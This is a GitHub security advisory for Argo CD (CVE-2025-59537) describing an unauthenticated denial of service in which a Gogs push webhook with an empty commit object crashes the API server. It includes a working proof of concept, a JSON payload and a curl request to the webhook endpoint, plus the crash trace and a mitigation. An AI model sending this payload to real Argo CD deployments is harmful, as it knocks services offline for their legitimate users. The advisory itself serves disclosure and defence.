ghsa-wp4p-9pxh-cgx2
Vulnerability from github
Summary
Unpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients.
With the default configuration, no webhook.gogs.secret set, Argo CD’s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field commits[].repo is not set or is null.
Details
Users can access /api/webhook without authentication, and when accessing this endpoint, the Handler function parses webhook type messages according to the header (e.g. X-Gogs-Event) and body parameters provided by the user. The Parse function simply unmarshals JSON-type messages. In other words, it returns a data structure even if the data structure is not exactly matched.
The affectedRevisionInfo function parses data according to webhook event types(e.g. gogsclient.PushPayload). However, due to the lack of data structure validation corresponding to these events, an attacker can cause a Denial of Service (DoS) attack by sending maliciously crafted data. because of Repository is Pointer Type.
```go func affectedRevisionInfo(payloadIf any) (webURLs []string, revision string, change changeInfo, touchedHead bool, changedFiles []string) { switch payload := payloadIf.(type) { // ... case gogsclient.PushPayload: webURLs = append(webURLs, payload.Repo.HTMLURL) // bug // ... } return webURLs, revision, change, touchedHead, changedFiles }
```
PoC
payload-gogs.json
json
{
"ref": "refs/heads/master",
"before": "0000000000000000000000000000000000000000",
"after": "0a05129851238652bf806a400af89fa974ade739",
"commits": [{}]
}
shell
curl -k -v https://argocd.example.com/api/webhook \
-H 'X-Gogs-Event: push' \
-H 'Content-Type: application/json' \
--data-binary @/tmp/payload-gogs.json
An attacker can cause a DoS and make the argo-cd service unavailable by continuously sending unauthenticated requests to /api/webhook.
``` panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x68 pc=0x280f494]
goroutine 302 [running]: github.com/argoproj/argo-cd/v2/util/webhook.affectedRevisionInfo({0x3bd8240?, 0x40005a7030?}) /go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:233 +0x594 github.com/argoproj/argo-cd/v2/util/webhook.(ArgoCDWebhookHandler).HandleEvent(0x40000f9140, {0x3bd8240?, 0x40005a7030?}) /go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:254 +0x38 github.com/argoproj/argo-cd/v2/util/webhook.(ArgoCDWebhookHandler).startWorkerPool.func1() /go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:128 +0x60 created by github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool in goroutine 1 /go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:121 +0x28 ```
Mitigation
If you use Gogs and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.
If you do not use Gogs, you can set the webhook secret to a long, random value to effectively disable webhook handling for Gogs payloads.
diff
apiVersion: v1
kind: Secret
metadata:
name: argocd-secret
type: Opaque
data:
+ webhook.gogs.secret: <your base64-encoded secret here>
For more information
- Open an issue in the Argo CD issue tracker or discussions
- Join us on Slack in channel #argo-cd
Credit
Sangjun Song (s0ngsari) at Theori (theori.io)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"last_affected": "1.8.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.14.19"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v2"
},
"ranges": [
{
"events": [
{
"introduced": "2.0.0-rc1"
},
{
"fixed": "2.14.20"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.2.0-rc1"
},
{
"fixed": "3.2.0-rc2"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"3.2.0-rc1"
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.1.7"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.0-rc1"
},
{
"fixed": "3.1.8"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.18"
},
"package": {
"ecosystem": "Go",
"name": "github.com/argoproj/argo-cd/v3"
},
"ranges": [
{
"events": [
{
"introduced": "3.0.0-rc1"
},
{
"fixed": "3.0.19"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-59537"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-476"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-30T18:28:38Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nUnpatched Argo CD versions are vulnerable to malicious API requests which can crash the API server and cause denial of service to legitimate clients. \n\nWith the default configuration, no `webhook.gogs.secret` set, Argo CD\u2019s /api/webhook endpoint will crash the entire argocd-server process when it receives a Gogs push event whose JSON field `commits[].repo` is not set or is null.\n\n### Details\n\nUsers can access `/api/webhook` without authentication, and when accessing this endpoint, the `Handler` function parses webhook type messages according to the `header (e.g. X-Gogs-Event)` and `body` parameters provided by the user. The `Parse` function simply unmarshals JSON-type messages. In other words, it returns a data structure even if the data structure is not exactly matched.\n\nThe `affectedRevisionInfo` function parses data according to webhook event types(e.g. `gogsclient.PushPayload`). However, due to the lack of data structure validation corresponding to these events, an attacker can cause a Denial of Service (DoS) attack by sending maliciously crafted data. because of Repository is Pointer Type.\n\n```go\nfunc affectedRevisionInfo(payloadIf any) (webURLs []string, revision string, change changeInfo, touchedHead bool, changedFiles []string) {\n switch payload := payloadIf.(type) {\n // ...\n case gogsclient.PushPayload:\n webURLs = append(webURLs, payload.Repo.HTMLURL) // bug\n // ...\n }\n return webURLs, revision, change, touchedHead, changedFiles\n}\n\n```\n### PoC\n\npayload-gogs.json\n\n```json\n{\n \"ref\": \"refs/heads/master\",\n \"before\": \"0000000000000000000000000000000000000000\",\n \"after\": \"0a05129851238652bf806a400af89fa974ade739\",\n \"commits\": [{}]\n}\n```\n\n```shell\ncurl -k -v https://argocd.example.com/api/webhook \\\n -H \u0027X-Gogs-Event: push\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n --data-binary @/tmp/payload-gogs.json\n```\n\nAn attacker can cause a DoS and make the argo-cd service unavailable by continuously sending unauthenticated requests to `/api/webhook`.\n\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x1 addr=0x68 pc=0x280f494]\n\ngoroutine 302 [running]:\ngithub.com/argoproj/argo-cd/v2/util/webhook.affectedRevisionInfo({0x3bd8240?, 0x40005a7030?})\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:233 +0x594\ngithub.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).HandleEvent(0x40000f9140, {0x3bd8240?, 0x40005a7030?})\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:254 +0x38\ngithub.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool.func1()\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:128 +0x60\ncreated by github.com/argoproj/argo-cd/v2/util/webhook.(*ArgoCDWebhookHandler).startWorkerPool in goroutine 1\n\t/go/src/github.com/argoproj/argo-cd/util/webhook/webhook.go:121 +0x28\n```\n\n### Mitigation\n\nIf you use Gogs and need to handle webhook events, configure a webhook secret to ensure only trusted parties can invoke the webhook handler.\n\nIf you do not use Gogs, you can set the webhook secret to a long, random value to effectively disable webhook handling for Gogs payloads.\n\n```diff\napiVersion: v1\nkind: Secret\nmetadata:\n name: argocd-secret\ntype: Opaque\ndata:\n+ webhook.gogs.secret: \u003cyour base64-encoded secret here\u003e\n```\n\n### For more information\n\n* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions)\n* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd\n\n### Credit\n\nSangjun Song (s0ngsari) at Theori (theori.io)",
"id": "GHSA-wp4p-9pxh-cgx2",
"modified": "2025-09-30T18:28:38Z",
"published": "2025-09-30T18:28:38Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-wp4p-9pxh-cgx2"
},
{
"type": "WEB",
"url": "https://github.com/argoproj/argo-cd/commit/761fc27068d2d4cd24e1f784eb2a9033b5ee7f43"
},
{
"type": "PACKAGE",
"url": "https://github.com/argoproj/argo-cd"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "argo-cd vulnerable unauthenticated DoS via malformed Gogs webhook payload"
}
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.